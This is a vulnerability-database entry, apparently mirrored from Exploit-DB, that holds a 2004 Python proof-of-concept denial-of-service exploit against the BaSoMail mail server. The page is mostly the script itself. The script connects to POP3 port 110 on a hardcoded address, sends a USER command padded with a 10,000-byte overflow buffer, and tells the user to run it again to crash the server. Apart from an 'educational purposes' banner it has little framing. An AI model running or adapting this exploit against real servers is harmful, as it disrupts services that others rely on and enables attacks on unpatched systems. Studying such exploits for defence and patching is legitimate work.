BaSoMail - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054732 漏洞类型
发布时间 2004-10-26 更新时间 2004-10-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/599
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################
# BaSoMail Multiple Buffer Overflow DOS		 	#
# 24 Oct 2004 - muts 					#
# Probably exploitable - However, I lack sleep!        	#
#########################################################

import struct
import socket

print "\n\n######################################################"
print "\nBaSoMail Multiple Buffer Overflow DOS"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nAlmost all the SMTP and POP3 commands are prone to BO.\n" 
print "\nFor Educational Purposes Only!\n" 
print "\n\n######################################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Example buffer overflow 

buffer = '\x41'*10000

try:
	print "\nSending evil buffer..."
	s.connect(('192.168.1.32',110))
	s.send('USER ' + buffer + '\r\n')
	data = s.recv(1024)
	s.close()
	print "\nRun this script again, and server should crash."
except:
	print "\nCould not connect to sever!"

# milw0rm.com [2004-10-26]